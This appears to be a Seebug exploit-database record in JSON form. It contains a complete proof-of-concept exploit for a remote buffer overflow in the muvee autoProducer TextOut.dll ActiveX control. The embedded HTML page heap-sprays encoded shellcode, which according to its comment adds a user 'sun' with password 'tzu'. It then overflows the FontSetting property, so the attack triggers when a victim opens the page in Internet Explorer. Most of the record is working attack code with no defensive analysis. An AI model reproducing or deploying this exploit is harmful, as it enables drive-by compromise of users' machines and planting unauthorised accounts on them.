Description
No description provided by source.
{"sourceData": "\n <!--\nmuvee Technologies Text-Effect DXT Filter for autoProducer (TextOut.dll v6.0.18.1)\nFontsetting property remote buffer overflow exploit\n\nbug found by Nine:Situations:Group::Trotzkista\nour site: http://retrogod.altervista.org/\n\nsoftware site: http://www.muvee.com/en/\npackages: muvee AutoProducer 6.0 / 6.1\ntested on Win2k3 datacenter edition / IE6\n WinXPSP2 / IE6\ndll settings:\nRegKey Safe for Script: False\nRegKey Safe for Init: False\nImplements IObjectSafety: True\nIDisp Safe: Safe for untrusted: caller\n\nIf you think this poc is useful, please help us to improve our equipment and\ndonate through the paypal button on our site!\n-->\n<html>\n<object classid='clsid:AA478771-468A-41AB-9D97-263B6580FE8C' id='DXTTextOutEffect' />\n</object>\n<script language='javascript'>\n//completely ripped from a rgod exploit\n//add su one, user: sun pass: tzu\nshellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +\n "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +\n "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +\n "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +\n "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +\n "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +\n "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +\n "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +\n "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +\n "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +\n "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +\n "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +\n "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +\n "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +\n "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +\n "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +\n "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +\n "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +\n "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +\n "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +\n "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +\n "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +\n "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +\n "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +\n "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +\n "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +\n "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +\n "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +\n "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +\n "%u7734%u4734%u4570");\nbigblock = unescape("%u0A0A%u0A0A");\nheadersize = 20;\nslackspace = headersize+shellcode.length;\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\nfillblock = bigblock.substring(0, slackspace);\nblock = bigblock.substring(0, bigblock.length-slackspace);\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\nmemory = new Array();\nfor (i=0;i<510;i++){memory[i] = block+shellcode}\nbuff=""; for (i=0;i<500;i++){buff = buff+unescape("%u0d0d%u0d0d")}\nDXTTextOutEffect.FontSetting=buff; window.location.reload( true );\n</script>\n</html>\n\n# sebug.net\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-13198", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-13198", "type": "seebug", "viewCount": 5, "references": [], "lastseen": "2017-11-19T21:40:07", "published": "2008-06-12T00:00:00", "cvelist": [], "id": "SSV:13198", "enchantments_done": [], "modified": "2008-06-12T00:00:00", "title": "muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645481639, "score": 1659785532, "epss": 1678851499}}
{}
muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit